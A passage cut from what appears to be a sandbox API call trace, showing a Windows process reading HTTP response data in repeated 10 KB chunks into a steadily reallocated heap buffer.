| out: lpBuffer=0x9817d10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.653] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x48800) returned 0x97d4510 [0121.653] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x981a510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x981a510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.656] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x4b000) returned 0x97d4510 [0121.656] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x981cd10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x981cd10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.657] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x4d800) returned 0x97d4510 [0121.657] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x981f510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x981f510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.709] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x50000) returned 0x97d4510 [0121.709] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9821d10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9821d10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.711] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x52800) returned 0x97d4510 [0121.711] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9824510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9824510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.711] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x55000) returned 0x97d4510 [0121.711] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9826d10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9826d10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.716] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x57800) returned 0x97d4510 [0121.716] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9829510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9829510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.724] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x5a000) returned 0x97d4510 [0121.724] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x982bd10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x982bd10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.730] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x5c800) returned 0x97d4510 [0121.730] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x982e510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x982e510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.737] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x5f000) returned 0x97d4510 [0121.737] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9830d10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9830d10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.744] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x61800) returned 0x97d4510 [0121.744] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9833510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9833510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.745] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x64000) returned 0x97d4510 [0121.745] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9835d10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9835d10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.745] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x66800) returned 0x97d4510 [0121.745] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9838510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9838510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.789] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x69000) returned 0x97d4510 [0121.789] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x983ad10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x983ad10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.790] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x6b800) returned 0x9630080 [0121.801] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9699080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9699080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.802] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x6e000) returned 0x969b890 [0121.810] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9707090, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9707090*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.811] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x969b890, Size=0x70800) returned 0x9a80080 [0121.820] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9aee080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9aee080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.820] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0x73000) returned 0x9630080 [0121.820] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96a0880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96a0880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.821] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x75800) returned 0x9630080 [0121.821] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96a3080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96a3080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.822] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x78000) returned 0x9630080 [0121.822] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96a5880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96a5880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.823] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x7a800) returned 0x9630080 [0121.823] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96a8080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96a8080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.823] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x7d000) returned 0x9630080 [0121.823] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96aa880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96aa880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.857] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x7f800) returned 0x9630080 [0121.857] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96ad080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96ad080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.864] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x82000) returned 0x9630080 [0121.864] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96af880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96af880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.867] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x84800) returned 0x9630080 [0121.867] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96b2080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96b2080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.870] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x87000) returned 0x9630080 [0121.870] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96b4880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96b4880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.879] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x89800) returned 0x9630080 [0121.880] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96b7080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96b7080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.885] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x8c000) returned 0x9630080 [0121.885] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96b9880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96b9880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.889] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x8e800) returned 0x9630080 [0121.889] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96bc080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96bc080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.894] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x91000) returned 0x9630080 [0121.905] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96be880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96be880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.906] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x93800) returned 0x9630080 [0121.906] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96c1080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96c1080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.907] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x96000) returned 0x9630080 [0121.907] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96c3880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96c3880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.911] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x98800) returned 0x9630080 [0121.911] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96c6080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96c6080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.938] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x9b000) returned 0x9630080 [0121.938] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96c8880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96c8880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.943] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x9d800) returned 0x9630080 [0121.944] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96cb080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96cb080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.947] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xa0000) returned 0x9630080 [0121.947] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96cd880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96cd880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.951] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xa2800) returned 0x9630080 [0121.951] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96d0080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96d0080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.957] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xa5000) returned 0x9630080 [0121.957] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96d2880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96d2880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.965] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xa7800) returned 0x9630080 [0121.965] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96d5080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96d5080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.969] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xaa000) returned 0x9630080 [0121.969] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96d7880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96d7880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.974] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xac800) returned 0x9630080 [0121.974] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96da080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96da080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.979] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xaf000) returned 0x9630080 [0121.979] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96dc880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96dc880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.986] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xb1800) returned 0x9630080 [0121.986] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96df080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96df080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.012] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xb4000) returned 0x9630080 [0122.012] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96e1880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96e1880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.017] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xb6800) returned 0x9630080 [0122.017] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96e4080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96e4080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.022] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xb9000) returned 0x9630080 [0122.022] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96e6880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96e6880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.025] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xbb800) returned 0x9630080 [0122.025] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96e9080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96e9080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.030] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xbe000) returned 0x9630080 [0122.030] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96eb880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96eb880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.035] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xc0800) returned 0x9630080 [0122.035] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96ee080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96ee080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.045] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xc3000) returned 0x9630080 [0122.045] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96f0880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96f0880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.050] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xc5800) returned 0x9630080 [0122.050] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96f3080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96f3080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.054] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xc8000) returned 0x9630080 [0122.054] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96f5880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96f5880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.062] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xca800) returned 0x9630080 [0122.062] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96f8080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96f8080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.064] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xcd000) returned 0x9630080 [0122.064] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96fa880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96fa880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.079] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xcf800) returned 0x9630080 [0122.079] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96fd080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96fd080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.096] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xd2000) returned 0x9630080 [0122.096] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x96ff880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96ff880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.101] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xd4800) returned 0x9630080 [0122.101] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9702080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9702080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.106] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xd7000) returned 0x9630080 [0122.106] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9704880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9704880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.109] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xd9800) returned 0x9630080 [0122.109] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9707080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9707080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.116] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xdc000) returned 0x9a80080 [0122.123] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9b59880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b59880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.125] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0xde800) returned 0x9a80080 [0122.125] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9b5c080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b5c080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.126] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0xe1000) returned 0x9a80080 [0122.126] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9b5e880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b5e880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.131] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0xe3800) returned 0x9a80080 [0122.132] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9b61080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b61080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.134] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0xe6000) returned 0x9a80080 [0122.135] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9b63880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b63880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.143] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0xe8800) returned 0x9a80080 [0122.144] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9b66080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b66080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.146] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0xeb000) returned 0x9a80080 [0122.146] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9b68880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b68880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.433] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0xed800) returned 0x9a80080 [0122.433] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9b6b080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b6b080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.434] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0xf0000) returned 0x9a80080 [0122.434] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9b6d880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b6d880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.434] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0xf2800) returned 0x9a80080 [0122.434] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9b70080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b70080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.435] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0xf5000) returned 0x9a80080 [0122.435] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9b72880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b72880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.436] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0xf7800) returned 0x9a80080 [0122.436] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9b75080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b75080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.436] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0xfa000) returned 0x9a80080 [0122.436] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9b77880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b77880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.437] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0xfc800) returned 0x9a80080 [0122.437] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9b7a080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b7a080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.437] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80080, Size=0xff000) returned 0x9850040 [0122.459] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x994c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x994c840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.460] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x101800) returned 0x9c80040 [0122.478] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9d7f040, dwNumberOfBytesToRead=0x2800, 